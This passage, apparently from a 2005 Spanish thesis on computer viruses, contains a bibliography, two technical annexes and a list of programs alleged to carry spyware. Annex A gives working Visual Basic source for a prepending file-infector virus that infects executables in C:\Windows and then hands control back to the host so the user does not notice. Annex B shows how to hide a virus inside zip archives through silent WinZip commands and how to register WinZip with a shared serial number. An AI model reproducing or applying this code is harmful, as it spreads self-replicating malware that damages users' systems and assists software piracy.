9. CANTO, Julio. Vulnerabilidad en rama 2.6 del kernel de Linux por problema con
routing_ioctl(). Obtenida en Septiembre de 2005, de
http://www.hispasec.com/unaaldia/2525

10. Cibernauta. La III Campaña de Seguridad ofrece una solución antivirus para
dispositivos PDA. Obtenida en Septiembre de 2005, de
http://www.cibernauta.com/cibertecno/cibertecno_software_articulos.php?articulo=
3566.php

11. Ciberteca. La API de Windows. Obtenida en Septiembre de 2005, de

http://www.ciberteca.net/articulos/programacion/win32apis/

133
12. Comunicaciones World. La industria prepara un nuevo estándar de seguridad
para móviles. Obtenida en Octubre del 2005, de
http://www.aecomo.org/content.asp?contentid=3900&contenttypeid=2&catid=150&
cattypeid=2

13. Consumer. Virus para teléfonos móviles: una maldición a la vuelta de la

esquina. Obtenida en Septiembre de 2005, de
http://www.consumer.es/web/es/tecnologia/software/2005/09/11/145180.php

14. CONTRERAS, Mejuto G. Antivirus: no salga a Internet sin ellos. Obtenida en

Septiembre de 2005, de http://www.idg.es/pcworld/articulo.asp?id=119462

15. CORREA, Sergio. WAP: Tierra virgen para hackers. Obtenida en Septiembre
de 2005, de
http://www.hipermarketing.com/nuevo%204/contenido/tecnologia/telecomunicacion
es/nivel3wap.html

16. Datacraft. Historia de los virus. Obtenida en Junio de 2005, de

http://www.datacraft.com.ar/informatica-virushist.html

17. Diarioti. La telefonía IP será el nuevo blanco de los hackers. Obtenida en

Septiembre de 2005, de http://www.diarioti.com/gate/n.php?id=9629

18. Donatién. Qué es el registro de Windows. Obtenida en Septiembre de 2005,

de http://www.elhacker.org/index.php?Ver=Articulo&Viendo=76

19. El Hacker. Básicamente ¿Qué son los Troyanos?. Obtenida en Julio de 2005,
de http://www.elhacker.org/index.php?Ver=Articulo&Id=129

20. El Hacker. Información básica sobre virus informáticos. Obtenida en Julio de

2005, de http://www.elhacker.org/index.php?Ver=Articulo&Id=263

21. El Hacker. Listado de puertos utilizados por troyanos. Obtenida en Septiembre

de 2005, de http://www.elhacker.org/index.php?Ver=Articulo&Id=267

22. El PAIS, Operadoras y fabricantes intentan blindar los móviles ante la llegada
de virus. Obtenida en Septiembre de 2005, de
http://www.aecomo.org/content.asp?contentid=3859&contenttypeid=2&catid=150&
cattypeid=2

23. ESPIÑEIRA, Sheldon y Asociados. Los virus informáticos: Conocer el pasado

para enfrentar el futuro. Obtenida en Septiembre de 2005, de
http://www.pc-news.com/detalle.asp?sid=&id=11&Ida=1978

134
24. Falckon. Infección de ejecutables bajo VB. Obtenida en Septiembre de 2005,
de http://zod.com.mx/~gedzac/ezine/mitosis2.zip

25. FalKen. Librerías Dinámicas. Obtenida en Septiembre de 2005, de

http://www.canalvisualbasic.net/temarios/api1.asp

26. F-Secure Corporation. F-Secure Mobile Anti-Virus Symbian. Obtenida en

Septiembre de 2005, de
http://www.abcdatos.com/programas/programa/z1075.html

27. GALLO, Julián. En el futuro, los virus de computadora podrían enfermar a

seres humanos. Obtenida en Septiembre de 2005, de
http://www.juliangallo.com.ar/2004/11/en-el-futuro-los-virus-de-computadora.html

28. Geocities. Historia. Obtenida en Julio de 2005, de

http://www.geocities.com/ogmg.rm/Historia.html

29. Google. FAQ es.comp.virus. Obtenida en Agosto de 2005, de

http://groups.google.es/group/es.comp.virus/msg/8f288d5d0a4f678e?dmode=sour
ce

30. GORDON, Sarah. Antivirus Software Testing for the New Millenium. Obtenida
en Octubre de 2005, de
http://csrc.nist.gov/nissc/1996/papers/NISSC96/paper019/final.PDF

31. HERNÁNDEZ, Claudio. Hackers los piratas del chip y de Internet. Obtenido en
Junio de 2005, de http://www.elhacker.org/index.php?Ver=Articulo&Id=38

32. HERRANZ, Arantxa. Los virus para móviles. La punta del iceberg de mayores
amenazas. Obtenida en Septiembre de 2005, de
http://www.idg.es/dealer/actualidad.asp?id=43372

33. Hispasec. Comparativa Antivirus 2001: Comparativa Antivirus. Obtenida en

Septiembre de 2005, de
http://www.hispasec.com/directorio/laboratorio/articulos/Comparativa2001/index_ht
ml

34. IBLNEWS, Agencias. Los hackers sitúan su próximo objetivo en los teléfonos
móviles. Obtenida en Septiembre de 2005, de
http://iblnews.com/noticias/02/123917.html

35. IÑAKI, Urzai. Los virus del pasado y del futuro. Obtenida en Septiembre de
2005, de
http://www.windowstimag.com/atrasados/2004/87_mai04/articulos/firma_3.asp

135
36. kaspersky. Protección para PDAs. Obtenida en Septiembre de 2005, de
http://www.kaspersky.com.mx/prod.corp.pdas.html

37. Kuasanagui. Programación básica en Visual Basic. Obtenida en Septiembre

de 2005, de http://zod.com.mx/~gedzac/index2.php?id=articulos

38. Machado, Jorge. Breve Historia de los virus informáticos. Obtenida en Junio
de 2005, de http://www.perantivirus.com/sosvirus/general/histovir.htm

39. Manson M. Estudio sobre virus informáticos. Obtenida en Septiembre de

2005, de http://www.monografias.com/trabajos/estudiovirus/estudiovirus.shtml

40. Mcafeeb2b. Protección para móviles y PDAs. Obtenida en Septiembre de

2005, de
http://www.mcafeeb2b.com/international/spain/products/virusscan-
wireless/default.asp

41. MIASTKOWSKI, Stan. Virus ¡cuidado con la próxima generación!. Obtenida

en Septiembre de 2005, de
http://www.pcwla.com/pcwla2.nsf/0/E0F43200AA5A342080256A5D005DE23D

42. Microsoft. Introducción a los virus gusanos y troyanos. Obtenida en Agosto de

2005, de
http://www.microsoft.com/spain/seguridad/usuarios/viruses/virus101.mspx

43. Monografías. Seguridad informática: Virus informáticos. Obtenida en Agosto

de 2005, de
http://www.monografias.com/trabajos5/virusinf/virusinf.shtml#Quién_los_hace

44. MONTESINO ARMAS, Luis. (2003). Análisis comparativo de los principales

sistemas antivirus [versión electronica]. Obtenida en Octubre de 2005, de
http://eprints.rclis.org/archive/00001748/01/analisis.pdf

45. MORENO PÉREZ, Arnoldo. Puertas traseras o Backdoors. Obtenida en Junio

de 2005, de
http://alerta-antivirus.red.es/seguridad/ver.php?tema=S&articulo=4&pagina=2

46. MORENO PÉREZ, Arnoldo. Los virus en los PDAs. Obtenida en Septiembre
de 2005, de http://www.virusprot.com/Art35.html

47. Morgan. El spyware Que es, como funciona y como evitarlo. Obtenida en
Septiembre de 2005, de http://www.elhacker.org/index.php?Ver=Articulo&Id=280

136
48. MORLANS HERNANDEZ, Karel. SCHAPACHNICK, Edgardo. BARRETO,
José. Virus hoax. Obtenida en junio de 2005, de
http://www.fac.org.ar/scvc/help/virus/viresp.htm#Virus%20Hoax

49. Morusa. Infección de Zip’s y Rar’s. Obtenida en Septiembre de 2005, de

http://zod.com.mx/~gedzac/ezine/mitosis2.zip

50. Mouse. Virus para celulares también afecta a PCs. Obtenida en Septiembre
de 2005, de http://www.mouse.cl/detail.asp?story=2005/09/23/17/58/17

51. MUÑOZ, Beatriz. Un nuevo virus informático ataca ya a los móviles en

España. Obtenida en Septiembre de 2005, de
http://www.internautas.org/html/3103.html

52. Noticiasdot. Los móviles de última generación no son seguros. Obtenida en

Septiembre de 2005, de
http://www.noticiasdot.com/publicaciones/2004/1004/0710/noticias071004/noticias
071004-1.htm

53. Noticiasdot. Teléfonos móviles: el nuevo blanco de los hackers. Obtenida en

Septiembre de 2005, de
http://www.aecomo.org/content.asp?contentid=2046&contenttypeid=2&catid=150&
cattypeid=2

54. PACHECO, Federico G. diapositivas Spam y técnicas de filtrado. Obtenida en

Junio de 2005, de www.lionix.com

55. Panda Software. Virus en dispositivos móviles. Obtenida en Septiembre de

2005, de http://www.sumovil.com/rep_36.asp

56. Panda Software. Virus en dispositivos móviles. Obtenida en Septiembre de

2005, de http://www.sumovil.com/rep_3602.asp

57. PÉREZ MORENO, Arnoldo. ¿Que son los honeypots?. Obtenida en

Septiembre de 2005, de http://www.virusprot.com/Art33.html

58. PÉREZ MORENO, Arnoldo. Heurística antivirus. Obtenida en Septiembre de

2005, de
http://alerta-antivirus.red.es/virus/ver_pag.html?tema=V&articulo=6&pagina=4

59. RODRÍGUEZ VALDEZ, José Luis. Sistemas operativos en el cinturón.

Obtenida el 29 Septiembre de 2005, de
http://www.enterate.unam.mx/Articulos/2005/abril/sistopera.htm

137
60. SAAVEDRA, Karina. Cuál es el futuro de los virus en este 2005. Obtenida en
Septiembre de 2005, de
http://microasist.com.mx/noticias/internet/ksoin110105.shtml

61. SOTO, Miguel Angel. El pasado, presente y futuro de los virus de

computadora. Obtenida en Septiembre de 2005, de
http://www.axtel.net/DesktopDefault.aspx?tabindex=3&tabid=19

62. Udec. Historia. Obtenida en Junio de 2005, de

http://www2.udec.cl/~sscheel/pagina%20virus/historia.htm

63. Virusprot.com. Historia de los virus, capitulo I Los orígenes de los virus.
Obtenida en junio de 2005, de http://www.virusprot.com/Historia1.html

64. Virusprot.com. Historia de los virus, capitulo II 1988, Empieza el baile.

Obtenida en junio de 2005, de http://www.virusprot.com/Historia2.html

65. Virusprot.com. Historia de los virus, capitulo III 1989, El año de la avalancha.
Obtenida en junio de 2005, de http://www.virusprot.com/Historia3.html

66. Virusprot.com. Historia de los virus, capitulo IV 1990, El tema se complica.

Obtenida en junio de 2005, de http://www.virusprot.com/Historia4.html

67. Virusprot.com. Historia de los virus, capitulo V 1991, Lanzamiento de

productos y polimorfismo. Obtenida en junio de 2005, de
http://www.virusprot.com/Historia5.html

68. Virusprot.com. Historia de los virus, capitulo VI 1992, Un año muy

complicado. Obtenida en junio de 2005, de http://www.virusprot.com/Historia6.html

69. Virusprot.com. Historia de los virus, capitulo VII 1993, Virus y máquinas
polimórficas. Obtenida en junio de 2005, de
http://www.virusprot.com/Historia7.html

70. VSantivirus No. 509 - Año 6. Troyanos en teléfonos móviles. Obtenida en

Septiembre de 2005, de http://www.vsantivirus.com/29-11-01.htm#top

71. Wikipedia. Virus informático. Obtenida en Agosto de 2005, de

es.wikipedia.org/wiki/Virus_inform%C3%A1tico

138
 ANEXO A. INFECCION DE EJECUTABLES

Infectar ejecutables por el método prepending, para lo cual el virus se le

denominaría "HLLP", en la siguiente ilustración se puede entender mejor lo que
es:

[-------------] [-------------] Virus

Virus [-------------> Host [----------------> [-------------]
[-------------] [-------------] Host
[-------------]

Un virus prepending mueve los bits y bytes del host hacia al final posicionando
en primer lugar los bits y bytes suyos, de esta forma el virus toma el control de
todo el host, ejecutandose primero.

- La primera tarea es determinar el lugar donde se ubica nuestro virus:

Private Function guorm()

Dim lugar As String
lugar = App.Path
If Right(lugar, 1) = "\" Then
guorm = lugar + App.EXEName + ".exe"
Else
guorm = lugar + "\" + App.EXEName + ".exe"
End If
End Function

- Busqueda de archivos ejecutables

Con la siguiente función que será llamada desde el código del virus, se llamara
pasándole una carpeta, la cual devolverá una variable con todos los ejecutables
separados por el siguiente signo:"|" (sin comillas):

Private Function buscando(carpeta As String) As String

Dim cr As String, cx As String
cr = Dir$(carpeta + "*.exe")
While cr <> ""
cx = cx & cr & "|"
cr = Dir$
Wend
buscando = cx
End Function

139
- Infectando ejecutables

El siguiente paso será infectar los archivos que se hayan sacado con la función
anterior, esta función se llamara de la siguiente forma:

Call infectando Folder, archivo

Donde Folder es la carpeta la cual anteriormente se elegio para extraer archivos,

después se pone ahí el nombre del ejecutable.

Sub infectando(carpeta As String, exedañino)

On Error Resume Next
If carpeta <> "" And exedañino <> "" Then
Dim host As String
Dim firma As String
firma = "VIRUS" '<-------------------firma del virus
Open carpeta + exedañino For Binary Access Read As #1
host = Space(LOF(1))
Get #1, , host
Close #1
If InStr(host, firma) = 0 Then
Dim virus As String
Open guorm For Binary Access Read As #2
virus = Space(24576) '<----Tamaño en Bytes del virus, ver propiedades
del ejecutable para sacarlo
Get #2, , virus
Close #2
Open carpeta + exedañino For Binary Access Write As #3
Put #3, , virus
Put #3, , host
Put #3, , firma
Close #3
End If
End If
End Sub

Como se puede ver se comprobará primero si las variables carpeta y

exedañino contienen algo, seguidamente se establece en una variable la firma
que identificará a la especie para no volver a infectar un mismo ejecutable, se
procede a abrir el archivo en modo binario solo para leerlo, después se
comprueba si este contiene la firma y si da 0 procederemos a abrir el ejecutable
desde el cual estamos ubicados, para eso se llama a la función guorm, después
se especificara el tamaño del virus el cual se leera, una vez que se tenga leído se
procede a volver a abrir el archivo encontrado, el cual se le escribe primeramente

140
la variable que contiene el virus, seguido del host y la firma. la estructura del
nuevo ejecutable deberá quedar de esta forma:

[Virus]
[ HOST]
[FIRMA]

- Regenerando el host

Es de pensar por muchas personas que uniendo un ejecutable con otro, los dos se
ejecutan, pero esto es falso, siempre el que esté de primero será ejecutado, el
otro no, así que se tiene que buscar la forma de pasar el control al host para así
no dar sospechas al usuario de que a ejecutado un virus (Este odigo es solo
una introducción y aquí no se maneja API's para la identificación de las ventanas
y así eliminar el archivo cuando es cerrado etc.)

El siguiente Sub regenerará el archivo previamente infectado, ósea

le pasa el control.

Sub regenerando(ejecutable)
Dim host2 As String
Dim virs As String
Open ejecutable For Binary Access Read As #1
virs = Space(24576) '<- tamaño en bytes del virus, para sacarlo compilar
'el ejecutable y ver en propiedades
host2 = Space(LOF(1) - 24576) '<---se le resta el tamaño del virus a todo el host
'para que quede solo el ejecutable
Get #1, , virs
Get #1, , host2
Close #1
Dim xx, fso As Object
Randomize
xx = Int(Rnd * 100000)
Set fso = CreateObject("Scripting.FileSystemObject")
Open fso.GetSpecialFolder(2) & "\" & xx & ".exe" For Binary Access Write As #2
Put #2, , host2
Close #2
Dim aa
aa = Shell(fso.GetSpecialFolder(2) & "\" & xx & ".exe")
End Sub

Lo primero que se hara será abrir el exe y leer el host, se randomiza un número
aleatoria mente, se llama al objeto FSO para sacar el directorio TEMP, se crea
ahí un archivo binario nuevo y se le escribe lo previamente leído, y por ultimo se
ejecuta.

141
- instrucciones imprescindibles para el correcto funcionamiento del virus

Las siguientes subs serán imprescindibles para el funcionamiento del virus, lo

siguiente irá colocado en el sub form_load:

Dim comp As String

Open guorm For Binary Access Read As #1
comp = Space(LOF(1))
Get #1, , comp
Close #1
If InStr(comp, "VIRUS") <> 0 Then
regenerando (guorm)
End if

Se comprueba si se esta infectado, si es así llamamos al sub regenerando y se

empieza el proceso ya explicado antes.

Sin embargo esto no es todo :

Dim xd, xa, carpeti As String

carpeti = "C:\Windows\" '<-------- carpeta donde buscaremos los archivos para
infectar
xd = Split(buscando(carpeti), "|")
For Each xa In xd
infectando carpeti, xa
Next

Después de colocar el código anterior debajo se coloca este, el cual buscará en

una carpeta especificada los archivos que se van a infectar, luego los coloca en
una variable dimensional (Array) procediendo a realizar un for each para
extraerlas y llamar al sub que infectará los exe's y eso es todo.

- Algunos Términos:

HLLO = Hight Level Lenguage OverWriting

Virus que sobrescriben archivos para infectarlos

HLLA = Hight Level Lenguage Appending

Virus que infectan archivos pegándose al final del host

HLLP = Hight Level Lenguage Prepending

Virus que infectan archivos pegándose al principio del host
(Falckon, 2005)24.

142
 ANEXO B. INFECCION DE ZIP’s

La pregunta es como infectar archivos zip's y pues el programa Winzip ayuda en

ello. ¿Como? - Pues con los comandos que permiten zipear de manera que el
usuario no se de cuenta. Winzip proporciona comandos llamados parámetros
para crear zip`s, esto servirá para enviar el virus por mail zipeado, porque se
envia el archivo adjunto de extensión "exe" el sevidor de mail lo retendrá porque
son las extensiones más utilizadas por los virus en internet entre las cuales
estan las ".com", ".pif", ".scr", ".vbs", etc…; puede, así que zipeando si se puede.

- Primero que nada se debe de obtener la dirección de winzip:

HKLM\Software\Microsoft\Windows\Currentversion\Uninstall\Winzip\UninstallString

- El cual por ejemplo arrojará el siguiente valor al leer la cadena:

"C:\ARCHIVOS DE PROGRAMA\WINZIP\WINZIP32.EXE" /uninstall

- Como obtener la dirección:

Winzip = fso.GetParentFolderName(Direcciondewinzip)

- Algunos Comandos:

- Agregar un Archivo a un zip:

Shell Winzip & " -a " archivozip & " " & archivoexe

Ejemplo: Shell Winzip & " -a C:\Hola.zip" & " C:\virus.exe"

-Agregar varios archivos a un zip:

Se puede agregar varios archivos de diferentes formas por extensíon y por

nombre y dirección de los archivos. Ejemplo:

Shell Winzip & " -a C:\Hola.zip" & " C:\windows\System\*.*"

'Ziperá todos los archivos que se encuentran en ese directorio

Shell Winzip & " -a C:\Hola.zip" & " C:\windows\System\*.dll"

'Zipeará todos los archivos con extensión dll que esten en ese directorio

Shell Winzip & " -a C:\Hola.zip" & " C:\virus.exe C:\Archivo.txt"

'Zipeará los archivos que fueron escritos no importando la dirección

143
-Extraer Archivos:

La sintáxis para extraer archivos de un zip es la siguiente:

Shell Winzip & " -e " & archivozip & " " & directorio

Ejemplo: Shell Winzip & " -e C:\Hola.zip" & " C:\"

- Como Crear un Archivo zip sin formato:

Sólo Abre un archivo de modo binario y cierralo, es todo, nada mas que con
extensión zip.

Ejemplo: Open "C:\Archivozip.zip" for binary as #1

Close #1

- La infección:

Simplemente buscar por algún método de búsqueda el que se quiera y al

encontrarlo sólo adicionar el programa "Virus" con un nombre convincente para
que el usuario lo abra y así se produzca la infección en otro sistema.

Ejemplo: Si se encuentra el siguiente archivo --> "A:\Cosas.zip", Ahora se va

infectar.

Winzip = "C:\ARCHIVOS DE PROGRAMA\WINZIP\WINZIP32.EXE"

midir = "C:\Windows\System32\virus.exe"
Call infectar("A:\Cosas.zip")

Sub infectar(Direccion as string)

Shell Winzip " -a " & Direccion & " " & midir, VbHide
'Si se supone que winzip tiene el valor de la dirección y nombre del
'programa Winzip y midir tiene el valor de la dirección del exe junto con el
‘nombre y así ahora añadirlo.
'El VbHide sirve para ocultar el programa, así no se dará cuenta el
'usuario de que se está infectando un archivo de su diskette. Porque si
'no se pone caso de que tarde, se muestra el programa añadiendo un
'archivo.
End sub

144
- Registro de Winzip:

Otro problema que proporciona Winzip es que no esté registrado lo cual no es

Complicado de registrar simplemente con las siguientes cadenas del regedit:

"HKCU\software\nico mak computing\winzip\winini\Name"

"HKCU\software\nico mak computing\winzip\winini\SN"
"HKEY_USERS\.DEFAULT\software\nicomakcomputing\winzip\winini\Name"
"HKEY_USERS\.DEFAULT\software\nico mak computing\winzip\winini\SN"

Donde:
Name = "Nombre del registrado"
SN = "Numero de serie o Serial Number"

En estos Valores de cadena "REG_SZ" se puede crear uno con un generador de

numeros de serie que se puede encontrar en internet, Es igual el numero de serie
para registrar Winzip en todas sus versiones.

Ejemplo:
Name = "NOMBRE"
SN = "EBB9042E"

Si se escribe en el registro las cadenas anteriores con los valores de arriba

estará registrado winzip con el nombre de NOMBRE. Comprobado en versiones
8.x y 9.x) (Morusa, 2005)49.
.

145
 ANEXO C. PROGRAMAS CON SPYWARE

Cydoor
Abe's MP3 Finder HumanClick
AccessDiver iPhone
Angove CD Player Iper3
Ashampoo Uninstaller Lines98´/Lines Milenium
Audio CD MP3 Studio 2000 Locker4U
Babylon MatchBlox
Blinkin MoNooN3DR
Cash 2000 Monsters & Mayhem
Challenge Pool MP3 TagStudio
CD Recording Studio Online Call
CD Box Labaler Pro Othello FX
Connect Four PC-to-Phone
Contact Plus PostCryptum
Cowon Jet-Audio Photo Base Junior
Crosses & Zeroes Picture Line
Disconnector Quickhead-E
Dope Wars QMS Memory Squares
EldoS Keeper QMS Mystery of Magical
eLOL(Electronic Laugh Out
Loud) Numbers
EasyFill 2.02 ReGet
Easy Phone Book SeaWar
EzStock Sign Language Teacher
File Mentor Spam Buster
FindShare Speak Light
FreeBase Stats 99
Free MP3 SuperBot
Free Pics Task Plus
Free Tetris The Dictator
GenoPro Toag
GetDown ToasterMultiTester
GodeZip Virtual Friend
Html Tutor pro Vocabulary Wizard
Implosion screen saver YellowBase
In Vircible Anti Virus Zip Wrangler
3D Morris

EverAd
CuteFTP QuoTracker
Graph Paper Printer ReGet

146
Lines98 Shapez!
Mindjongg Vocabulary Wizard
Mixman Studio 100% Word Search Free
PlayJ Studio

Web3000
Afreet SiteViewer Kmail
An Online Secretary Kmp3
AOL Anti-Timer Maxiimus
Ariadne Browser Media Player
Auction Station My To Do
Beeline Netcaptor
Bio-Rhythms NetMonitor
Buddy Pad NetSonic
Calendar+ NotePad+
Calendar+ 2000 Password Manager
CD Extractor PCDJ
Email Extractor ShellGem
EpAssist SpyTech
EZSurfer 2000 Time Manager
eWork S TypeItIn
File & MP3 Renamer Validate CC
GenoPro Web Resume Wizard
GPL WebSurfAce
Gimme IP Web Word Wrestle
HiClock 100 Proof Cocktail Planner
JSoft Mail !Glance
KFK 1st Contact
KFTP

DSSAgent
Mattel Retail products TimeWarner software

Radiate
Aaron's WebVacuum 0.8f MP3 Renamer 1.33
Abe's FTP Client Mp3 Stream Recorder 2.3
Abe's Image Viewer 1.1 MultiSender 1.03
Abe's MP3 Finder 4.0 Music Genie 1.0
Abe's Picture Finder 1.4 MX Inspector BIG AD
Abe's SMB Client My Genie Sports Edition 2.5
Absolute Telnet 1.63 My Genie Patriots
Access Diver III My Genie SE
Ace of Humor 1.0 My GetRight 1.0
AceNotes Free 2000c NeatFTP 1.0
Acorn Email 2.5 Net CB 1.0

147
ActionOutline Light 1.6 NewsShark
Active 'Net 1.0 Net-A-Car Feature Car
AcqURL 3.1 Screensaver
Add/Remove Plus! 1.1 NetAnts
Add URL 1.0 NetBoard
Address Rover 98 Netbus Pro 2.10
Admiral VirusScanner 1.0 NetCaptor 5.0
Advanced Call Center 2.9 Netman Downloader 1.0
Advanced Maillist Verify 1.6 NetMole 1.0
Advanced internet Tool 2.2.2 NetNak 4.2
Advertisement Wizard Net Scan 2000
AdWizard NetShark 1.0
Alchemy Anaconda NetSuck 3.10.5/3.1
Alive and Kicking 3.1 NetTime Thingy 1.5
AllNetic WWW and FTP
Observer Net Vampire 3.3
AlphaScape QuickPaste NeuroStock
AnchorNet1 NewsWire 1.5
Applet Game Mania 1.7 Network Assistant 1.9
ASP1-A3 1.0 NetXtract
Auction Central 1.02 NeuroStock
Auction Explorer NfoNak 4.1
AutoFTP PRO 2.3 NikNak 2.0.1
AutoWeb 1.0 NotePads+ 2.0
Aureate Group Mail 3.0 Notificator 1.01b
Aureate SpamKiller Free
Edition Octopus 3.0
AxelCD 2.1 OfTheDay Creator 1.0
AxMan OfTheDay Quizzer 1.1
Beatle OnlineCall 1.19
bigEListener Option Insight 0.6.2
Binary Boy 1.70 123Search
BinaryVortex 1.4 123Search 2
BizAgent 1 15 Puzzle 2.1
Blue Engine 1.0 1 ClickWebSlideShow
BookSmith : Original 1.2 20/20
BuddyPhone 2.0 5star Free Lines 1.2'
Bullseye Searcher 2.5 7way 0.15
Calypso E-mail 3.0 Paint by numbers
CamCollect 1.4c Pattern Book 1.0.02
CamGrab PerfectPartner-Time&Billing
Canasis vB vB-Beta (Demo)2.0
Capture Express 2000 1.0 Personal internet Finder 1.7
Car Lot Web Site Creator 1 Personal Search Agent .8
Carlanthano 2.9.868 People Seek 98

148
Cascoly Screensaver 1.0
CD-AID 02.00.05.23
CDDB-Reader
CDMaster32 3.0
Centarsia 1.01
ChanStat 3.3
Charity Banner 1.0
Cheat Machine 3.1
Check&Get 1
Check4New 1.7
ChinMail 1.2
Clabra clipboard viewer 1.2
Classic Peg Solitaire 1.0
ClipMate5-Student Edition
Clock Saver 1.0
ComTry Music Downloader
2.2
Concentration Done Right 1
Connection Watcher 4
Crystal FTP 2000
CSE HTML Validator Lite
CuteFTP 3.0/3.5
CuteFTP 3.0 beta
CuteFTP/Tripod
CutePage 2.0
CuteMX
CutePage
Danzig Pref Engine 1 1
DateTime 1.3
Desk Reference 0.1
Delphi Component Test
Delphi Tester
Dialarm 1.0.1.19
Dialer 2000 1.5
DigiBand NewsWatch
Digi-Cam Web Page
Generator
DigiCams - The WebCam
Viewer 1.0
Digital Postman 2.0
Direct Connect 0.9.963
DirectUpdate
diskSpace explorer 2000 2.1
DL-Mail Pro 2000
Doorbell 1.18
PGNSetup
Photocopier 2.0
PicPluck 2.0
Pictures In News 1.0
PingMaster
Ping Thingy
Pixel Pirate 1.0
Planet.Billboard
Planet.MP3Find 3.0
PMS
ponnu CHAMY's Music
PopMon 1.0.0.1
Popup Dictionary 2.0.70
PowerPak Accounting and
Inventory Management-Demo 2
PrePromote 1.0.0
PromaSoft Autoresponder
10.732
ProtectX 3.0
ProxyChecker
Q*Wallet 1.6
QuadSucker/Web 1.8
Quadzle Puzzles
QuikLink Autobot
QuikLink Explorer
QuikLink Explorer Freeware
Edition 3.0
QuikLink Explorer Gold Edition
3.0
Quta
Quote Ticker Bar 6.0
QuoteWatch 4.2
Quo Tracker 1.1.48
Real Estate Web Site Creator
1.0
ReallyEasy interactor 3.0(1)
RealReverb Convolution 1.3
Recipe Review
Rededit
ReGet 1.6
Remoteshut
Rename Master
149
DownloadAgent Rest Your Eyes 3.0
Download Minder 1.5/1.8 Resume Detective 1.5
DownLoader 1.1 RingSurf
Download Wonder 1.55 RoboCam 1.10
dozeCrypt III Rosemary's Weird Web World
DuRu 1 Rosoft CD Extractor 1.09
Dwyco Video Conferencing
2.3 Rosoft Media Player.1
eAssist SaberQuest Page Burner
EasySeeker 4.0 SaberQuest Tag Specification
Easy Splitter 1 Edit
EIS Web Monitor 1.2 Savings4u 1.0 Beta 3
Email Extractor'99 2.92 SBJV 3.0
Encoding Utility 2000 SBWcc 2.0
EnvoyMail Scout's Game 1.0
EURO Converter 2 scout's Game 1.02.1
Everylink for You 2000 ScreenFIRE 3.0
EVocabFlashCard 1.0 ScreenFIRE - FileKing
Executive Accounting-Demo ScreenFlavors
Express Communicator 1 Scripto .80
EZ-Forms FREE Sea Battle 1.0
File&MP3 Renamer'99 SERanker 1.24
File Mag-Net 3.0 Shapez! 1.0
FileSeeker Shizzam 2.6
FileSender SimpleFind 1.0
FileSplit 2.2 Simple Submit 1.0
Fire Client 1.5b1100 SiteBack
FlashGet (Formerly JetCar)
0.87 SiteChecker
FloorplanLT Sitesniffer 1.0
Folder Guard Jr. 4.1 Skeek Shooting 1.1
FormToolLT SK-111
FourTimes 3.5 SLEdit
Frazzle Slide Puzzle 1.00
FreeBudget SmartBoard 200 FREE Edition
Free Hearts for Windows 1 2.6
FreeImageEditor 1.0 Smart 'n Sticky
FreeIRC 1.0 SmartSum Calculator 2.0
FreeNotePad 1.0 Snap-It 4.0
Free Picture Harvester Snipsnap 2.0
FreeSaver MP3 1.0 SoftCuisine 2 2.0
FreeSite 1.0 SonicBurn 1.3.178
Free Solitaire 3.0 SonicMail 2.6
Free Spades .7 Sound Agent 1 0
FreeSubmit 1.0 Space Checker

150
Free Submitter Pro Space Central Screen Saver
FreeWebBrowser 1.0 Speaking Email Deluxe 5.5.0
FreeWebMail 1.0 Splash! Siterave
FreeZip! 2.0 Spherical HTML-Templator
FTPEditor 1.7 Spherical MP3INFO-Editor 1.0
Fundi e-Lert 1.4.1.29 StartDrive 1.0
GenoPro 1.71 Static FTP
GetRight 4.1 StationRadio
GetRight 4.2 c StockBrowser 1.9
GetRight Mail Control 1.0 Subscriber
Gif Animator 1.00 SunEdit 2K
GifLine Pro 2.0.2 SunEdit 2k Mod Manager
GovernMail SunKoSoft WebNewser 1.0b
Go!Zilla 3.5 SuperIDE 1.4
Go!Zilla WebAttack Sweep 1.4
Gomoku Pro 1.1 SweepsWinner
GovernMmail 1.1 Text Transmogrifier
Grafula 1.2 The Cassette Tape Producer
Gunther's PasswordSentry 4.0.6
HangWeb The Receptionist Desktop
Hey.Beer.Man Edition 5
hesci Private Label The Star Wars Combine
Host Monitor 4 HoloCom
HTML Translator 2.5 The Mapper
HTTP Proxy-Spy TheNet 3.69
Huey v1.8 Color Picker 1.8 Tic-Tac-Toe Done right
HyperSnap-DX3.61 TIFNY 3.0
iAgent 1.0 TI-FindMail 2.0
Iban Technologies IP Tools
2000 3.1 too Many Secrets 0.0.6 beta
Ice Fusion Total Finger 1.3
Idyle GimmIP 4/4.00 Total Whois 2.0
iFind Graphics 1.5 Tracking The Eye 1999
imageN Trade Site Creator 1.1
ImagerX2000 3.0 Traffic Attractor 2000 4
Infinite Patience 2.2 Triangle Puzzle 1.00
InfoBlast Trivialnet 0.60
InnovaClub TUCOWS Uploader 2.11
In School We Trust (Pupil
Edition) twinExplorer 2.5
InstallZIP 1.4 TWinExplorer Standard
iNetPad 3.1 TypeWriter 1.0
Interchange FTP 0.2.1 3rd block 2.0
InterFax 6.0.0 3d Anarchy
Internet Tree 2.0 3D-FTP 3.0

151
Internetrix 1.0 3S Accounting
InterWebWord Companion 3SI Accounting&Inventory
Invisible Secrets 2.0 Management (Demo) 2.0
IP-Turboscanner UdmSearch 3.0..11.2
iToday UK Phone Codes
Iwan's MP3 Finder 1.1 Vagabond's Realm 0.9.1
IYSoft Dial-Up Connection 1.2 VeriMP3 1.0
JetCar Veritape 1.3
JFK Research Vertigo QSearch
jIRC Virtual Access 5.0
JOC Email Checker 1.7 Visual Surfer 1.4
JOC Web Finder VOG Backgammon Main 2
JOC Web Spider 2.6 VOG Backgammon Table
JPEG Optimizer 3.07 VOG Chess 2
JrEdit 1 VOG Chess Main
JOC Web Spider VOG Chess Table
Kachat Messenger Visual Cyberadio
Keyword Monitor 1 VOG Reversi Main
KVT Diplom VOG Reversi Table
LapLink FTP 2.0 VOG Shell
Laser Chess 1.0 VOG Shell History
LinkProver 2.0 W3Filer(32) Up/Downloader -
LineSoft Download Internet Files 3.1.3
LOL Chat 2.5 WarrenView 1.0
Magellan explorer 2.2 'WE' Group ProxyChecker 3.1.8
Mail Them WebBug
Manifest Timetrap 3.0 WebCamVCR 1.0
Marker 1.1 WebCam Wonder 1.0
Meracl FontMap WebCopier 1.3
MASH-The Microsoft Agent Web Coupon 1.0
Scripting Helper 4.5.3 WebDrive 3.0
MasterCrypt 2.0 Web Database
Match It 1.0 WebHunt 2.8
Maxxchat 1.0 B-6 Webman 5.3
Meeting Planner 0.8.0.1 Web-N-Force 1.7
MegaSafe 6 Web Page Authoring Software
MemriC 1.0 WebReaper 8.0
Meracl FontMap 1.2 Web Registrant PRO 4.0
